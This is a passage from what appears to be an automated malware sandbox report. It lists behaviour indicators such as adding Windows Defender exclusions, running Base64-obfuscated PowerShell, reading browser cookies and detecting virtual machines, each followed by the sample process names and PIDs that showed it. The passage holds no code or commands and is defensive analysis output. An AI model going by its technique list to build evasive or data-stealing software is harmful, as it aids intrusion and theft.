  - Archevod_XWorm.exe (PID: 2644)
  - Opolis.exe (PID: 5004)
  - more.exe (PID: 6716)
  - 288c47bbc187122b439df19ff4df68f076.exe (PID: 7528)
  - buildz.exe (PID: 10228)
  - %E6%9A%97%E5%B7%B7%E8%A7%86%E9%A2%91%E8%A7%A3%E6%9E%90%E5%8A%A9%E6%89%8B.exe (PID: 9664)
  - loader.exe (PID: 8432)
  - rhsgn_protected.exe (PID: 8684)
  - newbuild.exe (PID: 9012)
  - a3e34cb.exe (PID: 4936)
- The process executes VB scripts
  - pdf.exe (PID: 2476)
  - taskeng.exe (PID: 3068)
  - PluginFlash.exe (PID: 5296)
  - NINJA.exe (PID: 5000)
  - svchost.com (PID: 4796)
  - cmd.exe (PID: 3372)
- The process verifies whether the antivirus software is installed
  - twty.exe (PID: 3656)
  - cmd.exe (PID: 3372)
- Runs shell command (SCRIPT)
  - wscript.exe (PID: 3700)
  - wscript.exe (PID: 5120)
- Executing commands from a ".bat" file
  - wscript.exe (PID: 3700)
  - clip.exe (PID: 4224)
  - WinLocker.exe (PID: 6016)
  - cp.exe (PID: 1904)
  - hvthvjgfr6tyghgdtrtyigkhvjggft.exe (PID: 7800)
  - more.exe (PID: 6716)
  - fd432592b959b22401bce262763b192065a90e3f.exe (PID: 6184)
  - wscript.exe (PID: 7240)
  - wscript.exe (PID: 6348)
  - conhost.exe (PID: 2072)
  - wscript.exe (PID: 9356)
- Script adds exclusion path to Windows Defender
  - savesinto.exe (PID: 2988)
  - WinScp.exe (PID: 4376)
  - WinDir.exe (PID: 7408)
  - fd432592b959b22401bce262763b192065a90e3f.exe (PID: 6184)
- Starts POWERSHELL.EXE for commands execution
  - savesinto.exe (PID: 2988)
  - svchost.com (PID: 5568)
  - powershell.exe (PID: 5576)
  - WinScp.exe (PID: 4376)
  - WinDir.exe (PID: 7408)
  - svchost.com (PID: 6568)
  - svchost.com (PID: 7336)
  - svchost.com (PID: 7624)
  - svchost.com (PID: 4904)
  - svchost.com (PID: 6368)
  - BelgiumchainAGRO.exe (PID: 4848)
  - fd432592b959b22401bce262763b192065a90e3f.exe (PID: 6184)
  - msiexec.exe (PID: 6380)
- Using PowerShell to operate with local accounts
  - powershell.exe (PID: 2832)
  - powershell.exe (PID: 900)
  - powershell.exe (PID: 3764)
  - powershell.exe (PID: 2592)
  - powershell.exe (PID: 2916)
  - powershell.exe (PID: 4036)
  - powershell.exe (PID: 3964)
  - powershell.exe (PID: 1644)
  - powershell.exe (PID: 3812)
  - powershell.exe (PID: 3644)
  - powershell.exe (PID: 3388)
  - powershell.exe (PID: 2636)
  - powershell.exe (PID: 1216)
  - powershell.exe (PID: 1316)
  - powershell.exe (PID: 2384)
- Uses WMI to retrieve WMI-managed resources (SCRIPT)
  - wscript.exe (PID: 5120)
- Creates FileSystem object to access computer's file system (SCRIPT)
  - wscript.exe (PID: 5120)
  - wscript.exe (PID: 5396)
  - 7zipFOPBACKEND.exe (PID: 4364)
  - wscript.exe (PID: 1016)
- Executes WMI query (SCRIPT)
  - wscript.exe (PID: 5120)
  - wscript.exe (PID: 1016)
- Base64-obfuscated command line is found
  - powershell.exe (PID: 5576)
- Checks whether a specific file exists (SCRIPT)
  - wscript.exe (PID: 5396)
- Reads browser cookies
  - AppLaunch.exe (PID: 6108)
  - flesh.exe (PID: 4404)
  - RegAsm.exe (PID: 4256)
- Reads the BIOS version
  - clip.exe (PID: 4224)
  - LEAJ.exe (PID: 4820)
  - cp.exe (PID: 1904)
  - AdobeUpdateres.exe (PID: 3716)
  - new.exe (PID: 6036)
  - AdobeUpdateres.exe (PID: 6772)
  - LEAJ.exe (PID: 6796)
- Uses TIMEOUT.EXE to delay execution
  - cmd.exe (PID: 4200)
  - cmd.exe (PID: 3700)
  - cmd.exe (PID: 8068)
- The process checks if it is being run in the virtual environment
  - 4363463463464363463463463.bin.exe (PID: 3168)
  - dialer.exe (PID: 4124)
- Uses NETSH.EXE to change the status of the firewall
  - cmd.exe (PID: 3372)
- Uses REG/REGEDIT.EXE to modify registry
  - cmd.exe (PID: 3372)
- Uses ATTRIB.EXE to modify file attributes
  - cmd.exe (PID: 3372)
  - cmd.exe (PID: 7964)
  - cmd.exe (PID: 8092)
- Accesses WMI object, sets custom ImpersonationLevel (SCRIPT)
  - wscript.exe (PID: 1016)
- Detected use of alternative data streams (AltDS)
  - NINJA.exe (PID: 5000)
- Reads security settings of Internet Explorer
  - WinScp.exe (PID: 4376)
  - 360TS_Setup_Mini_WW.Datacash.CPI202304_6.6.0.1054.exe (PID: 6372)
  - InstallSetup9.exe (PID: 5916)
  - WinDir.exe (PID: 7408)
- Checks Windows Trust Settings
  - WinScp.exe (PID: 4376)
  - 360TS_Setup_Mini_WW.Datacash.CPI202304_6.6.0.1054.exe (PID: 6372)
  - InstallSetup9.exe (PID: 5916)
  - WinDir.exe (PID: 7408)
- Starts NET.EXE to map network drives
  - cmd.exe (PID: 2884)
- Gets full path of the running script (SCRIPT)
  - wscript.exe (PID: 5120)
- Loads DLL from Mozilla Firefox
  - dialer.exe (PID: 4124)
- Accesses Microsoft Outlook profiles
  - dialer.exe (PID: 4124)
- Probably delay the execution using 'w32tm.exe'
  - cmd.exe (PID: 5500)
- Uses ICACLS.EXE to modify access control lists
  - buildz.exe (PID: 9776)
- The process bypasses the loading of PowerShell profile settings
  - msiexec.exe (PID: 6380)
- The process hide an interactive prompt from the user
  - msiexec.exe (PID: 6380)
- The process executes Powershell scripts
  - msiexec.exe (PID: 6380)
- Runs PING.EXE to delay simulation
  - cmd.exe (PID: 8932)
INFO
- Checks supported languages
  - 4363463463464363463463463.bin.exe (PID: 2064)
  - 4363463463464363463463463.bin.exe (PID: 1816)
  - 4363463463464363463463463.bin.exe (PID: 1844)
  - 4363463463464363463463463.bin.exe (PID: 452)
  - 4363463463464363463463463.bin.exe (PID: 2596)
  - 4363463463464363463463463.bin.exe (PID: 2524)
  - 4363463463464363463463463.bin.exe (PID: 3076)
  - 4363463463464363463463463.bin.exe (PID: 1028)
  - data64_1.exe (PID: 3236)
  - 4363463463464363463463463.bin.exe (PID: 3168)
  - data64_5.exe (PID: 3204)
  - data64_5.exe (PID: 3644)
  - toolspub2.exe (PID: 4072)
  - tuc4.exe (PID: 3868)
  - tidex_-_short_stuff.exe (PID: 3848)
  - toolspub2.exe (PID: 4020)
  - pcidevicechecker.exe (PID: 572)
  - updHost.exe (PID: 392)
  - is-SSOM8.tmp (PID: 3796)
  - pcidevicechecker.exe (PID: 1264)
  - cryptedgolden123sss.exe (PID: 1892)
  - RegAsm.exe (PID: 1924)
  - ms_tool.exe (PID: 1584)
  - Amdau.exe (PID: 3628)
  - tuc5.exe (PID: 980)
  - is-M2AQP.tmp (PID: 2920)
  - ms_updater.exe (PID: 696)
  - npp.exe (PID: 2260)
  - RegAsm.exe (PID: 3064)
  - cryptedgolden123.exe (PID: 2504)
  - Wattyl.exe (PID: 3244)
  - PCSupport.exe (PID: 3040)
  - tuc6.exe (PID: 1992)
  - is-6NB4B.tmp (PID: 2844)
  - jsc.exe (PID: 2616)
  - 5d3e8177e87cc.exe (PID: 2320)
  - svchost.exe (PID: 3660)
  - stub.exe (PID: 3284)
  - stub.exe (PID: 3960)
  - stub.exe (PID: 124)
  - svchost.exe (PID: 1072)
  - svchost.exe (PID: 3004)
  - stub.exe (PID: 2040)
  - winvnc.exe (PID: 1976)
  - NBYS%20AH.NET.exe (PID: 1888)
  - svchost.com (PID: 2080)
  - stub.exe (PID: 1632)
  - svchost.com (PID: 1864)
  - stub.exe (PID: 3636)
  - svchost.com (PID: 1608)
  - svchost.com (PID: 3736)
  - stub.exe (PID: 3380)
  - svchost.com (PID: 3288)
  - stub.exe (PID: 864)
  - svchost.com (PID: 3900)
  - stub.exe (PID: 2204)
  - svchost.com (PID: 1956)
  - svchost.com (PID: 2576)
  - stub.exe (PID: 3388)
  - stub.exe (PID: 392)
  - svchost.com (PID: 712)
  - svchost.com (PID: 3128)
  - stub.exe (PID: 2836)
  - svchost.com (PID: 900)
  - stub.exe (PID: 2776)
  - stub.exe (PID: 2760)
  - svchost.com (PID: 3124)
  - stub.exe (PID: 3196)
  - svchost.com (PID: 3088)
  - stub.exe (PID: 3508)
  - svchost.com (PID: 1424)
  - stub.exe (PID: 2948)
  - svchost.com (PID: 2260)
  - svchost.com (PID: 2916)
  - stub.exe (PID: 2488)
  - stub.exe (PID: 2756)
  - svchost.com (PID: 1860)
  - stub.exe (PID: 3204)
  - svchost.com (PID: 3660)
  - stub.exe (PID: 2044)
  - svchost.com (PID: 3564)
  - stub.exe (PID: 3560)
  - svchost.com (PID: 1864)
  - stub.exe (PID: 1216)
  - stub.exe (PID: 2076)
  - svchost.com (PID: 1632)
  - svchost.com (PID: 3764)
  - svchost.com (PID: 3816)
  - stub.exe (PID: 3640)
  - svchost.com (PID: 2384)
  - stub.exe (PID: 2564)
  - stub.exe (PID: 3896)
  - stub.exe (PID: 2000)
  - stub.exe (PID: 680)
  - svchost.com (PID: 2576)
  - svchost.com (PID: 392)
  - svchost.com (PID: 2736)
  - stub.exe (PID: 2796)
  - svchost.com (PID: 2760)
  - stub.exe (PID: 2832)
  - svchost.com (PID: 3132)
  - stub.exe (PID: 3372)
  - svchost.com (PID: 900)
  - svchost.com (PID: 1812)
  - stub.exe (PID: 1268)
  - svchost.com (PID: 3088)
  - stub.exe (PID: 1196)
  - stub.exe (PID: 3364)
  - svchost.com (PID: 2952)
  - stub.exe (PID: 3484)
  - svchost.com (PID: 2948)
  - stub.exe (PID: 3292)
  - svchost.com (PID: 3308)
  - svchost.com (PID: 3204)
  - svchost.com (PID: 2044)
  - stub.exe (PID: 2160)
  - stub.exe (PID: 584)
  - stub.exe (PID: 3864)
  - stub.exe (PID: 1632)
  - svchost.com (PID: 3560)
  - stub.exe (PID: 764)
  - svchost.com (PID: 1596)
  - stub.exe (PID: 3624)
  - svchost.com (PID: 2080)
  - svchost.com (PID: 3900)
  - stub.exe (PID: 3816)
  - svchost.com (PID: 3200)
  - stub.exe (PID: 3288)
  - stub.exe (PID: 2852)
  - svchost.com (PID: 2736)
  - svchost.com (PID: 3068)
  - stub.exe (PID: 1936)
  - svchost.com (PID: 2788)
  - stub.exe (PID: 3120)
  - svchost.com (PID: 3064)
  - svchost.com (PID: 4004)
  - stub.exe (PID: 712)
  - svchost.com (PID: 3372)
  - stub.exe (PID: 3148)
  - stub.exe (PID: 2476)
  - svchost.com (PID: 2804)
  - svchost.com (PID: 2832)
  - stub.exe (PID: 3132)
  - svchost.com (PID: 1812)
  - stub.exe (PID: 3872)
  - svchost.com (PID: 3432)
  - svchost.com (PID: 2448)
  - stub.exe (PID: 2488)
  - svchost.com (PID: 2260)
  - stub.exe (PID: 3544)
  - svchost.com (PID: 3656)
  - stub.exe (PID: 124)
  - stub.exe (PID: 3484)
  - stub.exe (PID: 116)
  - svchost.com (PID: 3704)
  - stub.exe (PID: 3520)
  - svchost.com (PID: 2036)
  - svchost.com (PID: 3516)
  - stub.exe (PID: 1596)
  - svchost.com (PID: 4036)
  - stub.exe (PID: 764)
  - svchost.com (PID: 3512)
  - stub.exe (PID: 1836)
  - svchost.com (PID: 1388)
  - stub.exe (PID: 3900)
  - svchost.com (PID: 2744)
  - stub.exe (PID: 3640)
  - stub.exe (PID: 2576)
  - stub.exe (PID: 2688)
  - svchost.com (PID: 2852)
  - svchost.com (PID: 1808)
  - stub.exe (PID: 2796)
  - svchost.com (PID: 864)
  - svchost.com (PID: 3016)
  - stub.exe (PID: 2988)
  - svchost.com (PID: 2784)
  - stub.exe (PID: 2812)
  - svchost.com (PID: 2484)
  - stub.exe (PID: 984)
  - stub.exe (PID: 2324)
  - svchost.com (PID: 2476)
  - svchost.com (PID: 3084)
  - stub.exe (PID: 3056)
  - svchost.com (PID: 1424)
  - svchost.com (PID: 3088)
  - stub.exe (PID: 2916)
  - stub.exe (PID: 2792)
  - svchost.com (PID: 2100)
  - svchost.com (PID: 3544)
  - stub.exe (PID: 1876)
  - stub.exe (PID: 3528)
  - svchost.com (PID: 3660)
  - stub.exe (PID: 2948)
  - stub.exe (PID: 584)
  - svchost.com (PID: 2044)
  - stub.exe (PID: 1344)
  - svchost.com (PID: 1772)
  - svchost.com (PID: 3512)
  - stub.exe (PID: 1924)
  - svchost.com (PID: 764)
  - stub.exe (PID: 4036)
  - svchost.com (PID: 1596)
  - stub.exe (PID: 1864)
  - stub.exe (PID: 3444)
  - svchost.com (PID: 1388)
  - stub.exe (PID: 1892)
  - svchost.com (PID: 2788)
  - svchost.com (PID: 956)
  - stub.exe (PID: 3044)
  - svchost.com (PID: 2504)
  - stub.exe (PID: 1936)
  - svchost.com (PID: 3416)
  - stub.exe (PID: 1808)
  - svchost.com (PID: 2760)
  - stub.exe (PID: 3364)
  - stub.exe (PID: 2988)
  - svchost.com (PID: 2832)
  - stub.exe (PID: 3632)
  - svchost.com (PID: 2964)
  - stub.exe (PID: 2804)
  - stub.exe (PID: 3084)
  - svchost.com (PID: 2436)
  - svchost.com (PID: 752)
  - stub.exe (PID: 1812)
  - stub.exe (PID: 3100)
  - svchost.com (PID: 2292)
  - svchost.com (PID: 2476)
  - svchost.com (PID: 2448)
  - stub.exe (PID: 3004)
  - svchost.com (PID: 2248)
  - svchost.com (PID: 3864)
  - stub.exe (PID: 1904)
  - stub.exe (PID: 1548)
  - svchost.com (PID: 2036)
  - stub.exe (PID: 1404)
  - svchost.com (PID: 3564)
  - svchost.com (PID: 1836)
  - svchost.com (PID: 1236)
  - stub.exe (PID: 3840)
  - svchost.com (PID: 2128)
  - stub.exe (PID: 764)
  - stub.exe (PID: 2044)
  - stub.exe (PID: 1780)
  - svchost.com (PID: 3972)
  - stub.exe (PID: 3900)
  - stub.exe (PID: 2056)
  - svchost.com (PID: 2692)
  - stub.exe (PID: 3444)
  - svchost.com (PID: 2928)
  - svchost.com (PID: 2852)
  - stub.exe (PID: 392)
  - svchost.com (PID: 4004)
  - stub.exe (PID: 2576)
  - stub.exe (PID: 2108)
  - svchost.com (PID: 2784)
  - svchost.com (PID: 3136)
  - svchost.com (PID: 2836)
  - stub.exe (PID: 3196)
  - svchost.com (PID: 3140)
  - stub.exe (PID: 2176)
  - stub.exe (PID: 2912)
  - svchost.com (PID: 3320)
  - stub.exe (PID: 3056)
  - stub.exe (PID: 3156)
  - svchost.com (PID: 1196)
  - stub.exe (PID: 2324)
  - svchost.com (PID: 3468)
  - stub.exe (PID: 1560)
  - svchost.com (PID: 2448)
  - stub.exe (PID: 1860)
  - svchost.com (PID: 1548)
  - svchost.com (PID: 2476)
  - stub.exe (PID: 3432)
  - svchost.com (PID: 2068)
  - svchost.com (PID: 2100)
  - stub.exe (PID: 124)
  - stub.exe (PID: 3660)
  - stub.exe (PID: 3704)
  - svchost.com (PID: 3820)
  - svchost.com (PID: 2044)
  - stub.exe (PID: 3636)
  - stub.exe (PID: 1316)
  - svchost.com (PID: 1836)
  - svchost.com (PID: 1236)
  - stub.exe (PID: 3816)
  - stub.exe (PID: 2592)
  - svchost.com (PID: 3644)
  - svchost.com (PID: 3900)
  - stub.exe (PID: 2740)
  - svchost.com (PID: 2788)
  - stub.exe (PID: 2928)
  - svchost.com (PID: 2240)
  - stub.exe (PID: 680)
  - svchost.com (PID: 2796)
  - stub.exe (PID: 4004)
  - svchost.com (PID: 712)
  - stub.exe (PID: 3064)
  - stub.exe (PID: 2812)
  - svchost.com (PID: 3164)
  - svchost.com (PID: 2832)
  - stub.exe (PID: 3124)
  - stub.exe (PID: 3508)
  - svchost.com (PID: 984)
  - stub.exe (PID: 2804)
  - svchost.com (PID: 2828)
  - svchost.com (PID: 3020)
  - svchost.com (PID: 3628)
  - stub.exe (PID: 2324)
  - svchost.com (PID: 3432)
  - stub.exe (PID: 2260)
  - stub.exe (PID: 3468)
  - svchost.com (PID: 2448)
  - stub.exe (PID: 1560)
  - stub.exe (PID: 2480)
  - svchost.com (PID: 2100)
  - stub.exe (PID: 3528)
  - svchost.com (PID: 1548)
  - svchost.com (PID: 2036)
  - stub.exe (PID: 3520)
  - svchost.com (PID: 3564)
  - stub.exe (PID: 2088)
  - svchost.com (PID: 3560)
  - stub.exe (PID: 3736)
  - svchost.com (PID: 548)
  - svchost.com (PID: 2128)
  - stub.exe (PID: 1236)
  - svchost.com (PID: 1596)
  - stub.exe (PID: 3764)
  - BestSoftware.exe (PID: 2384)
  - stub.exe (PID: 3964)
  - svchost.com (PID: 2744)
  - svchost.com (PID: 2928)
  - svchost.com (PID: 3200)
  - stub.exe (PID: 1892)
  - svchost.com (PID: 2240)
  - stub.exe (PID: 2504)
  - stub.exe (PID: 2760)
  - svchost.com (PID: 1808)
  - stub.exe (PID: 392)
  - stub.exe (PID: 884)
  - stub.exe (PID: 3364)
  - svchost.com (PID: 3492)
  - svchost.com (PID: 3064)
  - svchost.com (PID: 2812)
  - svchost.com (PID: 3020)
  - svchost.com (PID: 3812)
  - stub.exe (PID: 2176)
  - stub.exe (PID: 3140)
  - stub.exe (PID: 900)
  - stub.exe (PID: 3088)
  - svchost.com (PID: 3468)
  - stub.exe (PID: 3292)
  - svchost.com (PID: 1424)
  - svchost.com (PID: 2756)
  - stub.exe (PID: 3544)
  - stub.exe (PID: 3308)
  - svchost.com (PID: 2100)
  - stub.exe (PID: 1632)
  - svchost.com (PID: 2948)
  - stub.exe (PID: 1780)
  - svchost.com (PID: 480)
  - svchost.com (PID: 3784)
  - stub.exe (PID: 1772)
  - stub.exe (PID: 1216)
  - svchost.com (PID: 3764)
  - svchost.com (PID: 3704)
  - svchost.com (PID: 3624)
  - stub.exe (PID: 1596)
  - plink.exe (PID: 4036)
  - svchost.com (PID: 1924)
  - stub.exe (PID: 864)
  - stub.exe (PID: 2744)
  - svchost.com (PID: 680)
  - stub.exe (PID: 3552)
  - svchost.com (PID: 4004)
  - svchost.com (PID: 3068)
  - svchost.com (PID: 1936)
  - stub.exe (PID: 2988)
  - svchost.com (PID: 3196)
  - stub.exe (PID: 3136)
  - stub.exe (PID: 2836)
  - stub.exe (PID: 3492)
  - svchost.com (PID: 2932)
  - stub.exe (PID: 3872)
  - svchost.com (PID: 3124)
  - svchost.com (PID: 3812)
  - stub.exe (PID: 3100)
  - svchost.com (PID: 3392)
  - stub.exe (PID: 2320)
  - svchost.com (PID: 1996)
  - stub.exe (PID: 2296)
  - stub.exe (PID: 2448)
  - svchost.com (PID: 2260)
  - svchost.com (PID: 2860)
  - stub.exe (PID: 2488)
  - svchost.com (PID: 3548)
  - stub.exe (PID: 3404)
  - svchost.com (PID: 3608)
  - stub.exe (PID: 3520)
  - svchost.com (PID: 3648)
  - stub.exe (PID: 3596)
  - svchost.com (PID: 1864)
  - stub.exe (PID: 3640)
  - svchost.com (PID: 3972)
  - svchost.com (PID: 1892)
  - stub.exe (PID: 3044)
  - stub.exe (PID: 3068)
  - svchost.com (PID: 3072)
  - stub.exe (PID: 2788)
  - svchost.com (PID: 392)
  - stub.exe (PID: 2796)
  - stub.exe (PID: 2776)
  - svchost.com (PID: 2760)
  - stub.exe (PID: 3196)
  - svchost.com (PID: 3148)
  - svchost.com (PID: 4016)
  - stub.exe (PID: 572)
  - svchost.com (PID: 3120)
  - stub.exe (PID: 3064)
  - stub.exe (PID: 900)
  - svchost.com (PID: 3508)
  - svchost.com (PID: 2804)
  - stub.exe (PID: 3872)
  - svchost.com (PID: 3468)
  - stub.exe (PID: 3088)
  - stub.exe (PID: 3432)
  - svchost.com (PID: 1644)
  - svchost.com (PID: 2436)
  - stub.exe (PID: 1196)
  - svchost.com (PID: 2792)
  - stub.exe (PID: 2260)
  - svchost.com (PID: 2448)
  - stub.exe (PID: 3004)
  - stub.exe (PID: 2080)
  - svchost.com (PID: 3704)
  - stub.exe (PID: 3536)
  - svchost.com (PID: 3612)
  - svchost.com (PID: 3660)
  - stub.exe (PID: 2068)
  - svchost.com (PID: 3596)
  - stub.exe (PID: 3964)
  - svchost.com (PID: 1836)
  - stub.exe (PID: 3764)
  - svchost.com (PID: 1924)
  - stub.exe (PID: 2788)
  - svchost.com (PID: 3044)
  - stub.exe (PID: 2740)
  - svchost.com (PID: 3388)
  - stub.exe (PID: 3788)
  - svchost.com (PID: 3068)
  - stub.exe (PID: 2504)
  - svchost.com (PID: 392)
  - stub.exe (PID: 712)
  - svchost.com (PID: 2760)
  - svchost.com (PID: 3120)
  - stub.exe (PID: 2812)
  - svchost.com (PID: 3148)
  - stub.exe (PID: 3196)
  - stub.exe (PID: 2776)
  - svchost.com (PID: 3156)
  - stub.exe (PID: 3872)
  - stub.exe (PID: 2176)
  - svchost.com (PID: 984)
  - svchost.com (PID: 4016)
  - stub.exe (PID: 3492)
  - svchost.com (PID: 2324)
  - stub.exe (PID: 3812)
  - svchost.com (PID: 3628)
  - stub.exe (PID: 3468)
  - svchost.com (PID: 3228)
  - stub.exe (PID: 3544)
  - svchost.com (PID: 3060)
  - stub.exe (PID: 3432)
  - stub.exe (PID: 2792)
  - svchost.com (PID: 2292)
  - svchost.com (PID: 2088)
  - stub.exe (PID: 1772)
  - svchost.com (PID: 3564)
  - stub.exe (PID: 2080)
  - stub.exe (PID: 3308)
  - stub.exe (PID: 1216)
  - svchost.com (PID: 2000)
  - svchost.com (PID: 3512)
  - svchost.com (PID: 3612)
  - stub.exe (PID: 1820)
  - svchost.com (PID: 3972)
  - stub.exe (PID: 1924)
  - svchost.com (PID: 1832)
  - stub.exe (PID: 548)
  - stub.exe (PID: 1584)
  - stub.exe (PID: 3368)
  - svchost.com (PID: 2796)
  - svchost.com (PID: 3552)
  - svchost.com (PID: 3072)
  - stub.exe (PID: 2912)
  - svchost.com (PID: 2152)
  - stub.exe (PID: 4048)
  - stub.exe (PID: 3132)
  - svchost.com (PID: 1936)
  - svchost.com (PID: 2804)
  - stub.exe (PID: 2916)
  - svchost.exe (PID: 3392)
  - stub.exe (PID: 2360)
  - stub.exe (PID: 2860)
  - svchost.com (PID: 3872)
  - svchost.com (PID: 2324)
  - svchost.com (PID: 3196)
  - stub.exe (PID: 3632)
  - svchost.com (PID: 3088)
  - twty.exe (PID: 3656)
  - v2.exe (PID: 3060)
  - svchost.com (PID: 2488)
  - vbc.exe (PID: 2792)
  - pdf.exe (PID: 2476)
  - svchost.com (PID: 2000)
  - tuc2.exe (PID: 2692)
  - svchost.com (PID: 3764)
  - is-OUPR4.tmp (PID: 1656)
  - svchost.com (PID: 124)
  - svchost.com (PID: 2452)
  - route.exe (PID: 2928)
  - savesinto.exe (PID: 2988)
  - RegSvcs.exe (PID: 1864)
  - taskeng.exe (PID: 3068)
  - svchost.com (PID: 5020)
  - wlanext.exe (PID: 5216)
  - svchost.com (PID: 5568)
  - svchost.com (PID: 5768)
  - 360TS_Setup_Mini_WW.Marketator.CPI20230401_6.6.0.1054.exe (PID: 5776)
  - svchost.com (PID: 5908)
  - InstallSetup9.exe (PID: 5916)
  - RegSvcs.exe (PID: 5852)
  - svchost.com (PID: 6000)
  - svchost.com (PID: 6056)
  - SynapseExploit.exe (PID: 6064)
  - svchost.com (PID: 3372)
  - l.exe (PID: 6116)
  - PCclear_Eng_mini.exe (PID: 3444)
  - BroomSetup.exe (PID: 5936)
  - svchost.com (PID: 6100)
  - svchost.com (PID: 2784)
  - svchost.com (PID: 4496)
  - rise.exe (PID: 3240)
  - AppLaunch.exe (PID: 6108)
  - icsys.icn.exe (PID: 3308)
  - tungbot.exe (PID: 3536)
  - tungbot.exe (PID: 3164)
  - svchost.com (PID: 4720)
  - spoolsv.exe (PID: 5204)
  - svchost.exe (PID: 5044)
  - explorer.exe (PID: 5180)
  - svchost.com (PID: 4292)
  - svchost.com (PID: 4528)
  - 7.exe (PID: 5240)
  - clip.exe (PID: 4224)
  - svchost.com (PID: 2472)
  - spoolsv.exe (PID: 4240)
  - svchost.com (PID: 4244)
  - svchost.com (PID: 5328)
  - Financials-05-16-23-PDF.exe (PID: 4760)
  - jet.exe (PID: 5360)
  - svchost.com (PID: 5340)
  - build.exe (PID: 1424)
  - svchost.com (PID: 4192)
  - Recorder.exe (PID: 4188)
  - svchost.com (PID: 4908)
  - peinf.exe (PID: 5420)
  - Update.exe (PID: 4312)
  - svchost.com (PID: 4296)
  - svchost.com (PID: 5116)
  - NBYS%20ASM.NET.exe (PID: 4616)
  - svchost.com (PID: 5256)
  - LEAJ.exe (PID: 4820)
  - svchost.com (PID: 5464)
  - svchost.com (PID: 4716)
  - SuburbansKamacite.exe (PID: 2368)
  - svchost.com (PID: 5048)
  - pp.exe (PID: 3892)
  - Setup2010u32.exe (PID: 5136)
  - svchost.com (PID: 5268)
  - 7zipFOPBACKEND.exe (PID: 4364)
  - svchost.com (PID: 4860)
  - svchost.com (PID: 3964)
  - Temp3.exe (PID: 5260)
  - svchost.com (PID: 4520)
  - PsExec.exe (PID: 4576)
  - svchost.com (PID: 4540)
  - svchost.com (PID: 4836)
  - SystemUpdate.exe (PID: 4556)
  - Windows Security Client.exe (PID: 5356)
  - wab.exe (PID: 4136)
  - svchost.com (PID: 5504)
  - cryptedggggg.exe (PID: 5604)
  - RegAsm.exe (PID: 5780)
  - svchost.com (PID: 5768)
  - svchost.com (PID: 2492)
  - svchost.com (PID: 2292)
  - Synaptics.exe (PID: 956)
  - cp.exe (PID: 1904)
  - WinLocker.exe (PID: 6016)
  - ._cache_PsExec.exe (PID: 5564)
  - svchost.com (PID: 5572)
  - bc_memories_from_the_mcp.exe (PID: 1632)
  - svchost.com (PID: 4772)
  - svchost.com (PID: 4020)
  - _VTI_CNF.exe (PID: 4320)
  - svchost.com (PID: 4800)
  - svchost.com (PID: 4108)
  - flt_shovemydiscoupyourarse.exe (PID: 4196)
  - flesh.exe (PID: 4404)
  - svchost.com (PID: 3936)
  - AdobeUpdateres.exe (PID: 3716)
  - PluginFlash.exe (PID: 5296)
  - vbc.exe (PID: 2800)
  - NINJA.exe (PID: 5000)
  - svchost.com (PID: 4492)
  - svchost.com (PID: 4080)
  - svchost.com (PID: 5316)
  - svchost.com (PID: 4452)
  - svchost.com (PID: 4536)
  - qemu-ga.exe (PID: 4128)
  - adobe.exe (PID: 3156)
  - is-4O8IH.tmp (PID: 2968)
  - svchost.com (PID: 4796)
  - svchost.com (PID: 4268)
  - vbc.exe (PID: 4480)
  - 11.exe (PID: 4360)
  - svchost.com (PID: 3120)
  - svchost.com (PID: 3172)
  - svchost.com (PID: 1072)
  - sunset1.exe (PID: 4432)
  - svchost.com (PID: 1592)
  - svchost.exe (PID: 2848)
  - w-12.exe (PID: 1528)
  - ghjkl.exe (PID: 2984)
  - svchost.com (PID: 3132)
  - svchost.com (PID: 5228)
  - svchost.com (PID: 4004)
  - svchost.com (PID: 3492)
  - svchost.com (PID: 3704)
  - crypted.exe (PID: 5456)
  - ghjkl.exe (PID: 3084)
  - svchost.com (PID: 5796)
  - svchost.com (PID: 4116)
  - BLduscfibj.exe (PID: 4388)
  - new.exe (PID: 6036)
  - WinScp.exe (PID: 4376)
  - setuplll.exe (PID: 3380)
  - BLduscfibj.exe (PID: 5092)
  - InstallSetup3.exe (PID: 4604)
  - RegAsm.exe (PID: 4256)
  - svchost.com (PID: 4440)
  - buding.exe (PID: 4532)
  - pei.exe (PID: 4064)
  - svchost.com (PID: 5104)
  - svchost.com (PID: 6048)
  - InstallSetup6.exe (PID: 4704)
  - svchost.com (PID: 3772)
  - easy.exe (PID: 4740)
  - nszDC12.tmp (PID: 5452)
  - KB824105-x86-ENU.exe (PID: 2960)
  - svchost.com (PID: 4628)
  - svchost.com (PID: 4680)
  - svchost.com (PID: 5020)
  - svchost.com (PID: 5084)
  - taskeng.exe (PID: 4708)
  - NXYBankAssist.exe (PID: 3928)
  - AppLaunch.exe (PID: 5404)
  - svchost.com (PID: 1388)
  - svchost.com (PID: 1780)
  - more.exe (PID: 4220)
  - svchost.com (PID: 5124)
  - TaAgente.exe (PID: 3644)
  - Opolis.exe (PID: 5004)
  - svchost.com (PID: 572)
  - kb%5Efr_ouverture.exe (PID: 3940)
  - inst77player_1.0.0.1.exe (PID: 3708)
  - svchost.com (PID: 6356)
  - 360TS_Setup_Mini_WW.Datacash.CPI202304_6.6.0.1054.exe (PID: 6372)
  - svchost.com (PID: 6404)
  - svchost.com (PID: 6412)
  - crypted214124.exe (PID: 6440)
  - RegAsm.exe (PID: 6476)
  - svchost.com (PID: 6340)
  - InstallSetup8.exe (PID: 6652)
  - tpeinf.exe (PID: 6644)
  - LEAJ.exe (PID: 6796)
  - AdobeUpdateres.exe (PID: 6772)
  - svchost.com (PID: 6832)
  - idrB5Event.exe (PID: 6952)
  - system.exe (PID: 6784)
  - }uqUir9@J.exe (PID: 7052)
  - wmlaunch.exe (PID: 7072)
  - }uqUir9@J.exe (PID: 7092)
  - WinDir.exe (PID: 7408)
  - svchost.com (PID: 7400)
  - svchost.com (PID: 7628)
- Reads the computer name
  - 4363463463464363463463463.bin.exe (PID: 2064)
  - 4363463463464363463463463.bin.exe (PID: 1816)
  - 4363463463464363463463463.bin.exe (PID: 1844)
  - 4363463463464363463463463.bin.exe (PID: 452)
  - 4363463463464363463463463.bin.exe (PID: 2596)
  - 4363463463464363463463463.bin.exe (PID: 2524)
  - 4363463463464363463463463.bin.exe (PID: 3076)
  - 4363463463464363463463463.bin.exe (PID: 1028)
  - 4363463463464363463463463.bin.exe (PID: 3168)
  - data64_5.exe (PID: 3204)
  - data64_5.exe (PID: 3644)
  - tidex_-_short_stuff.exe (PID: 3848)
  - is-SSOM8.tmp (PID: 3796)
  - pcidevicechecker.exe (PID: 572)
  - Amdau.exe (PID: 3628)
  - cryptedgolden123sss.exe (PID: 1892)
  - RegAsm.exe (PID: 1924)
  - updHost.exe (PID: 392)
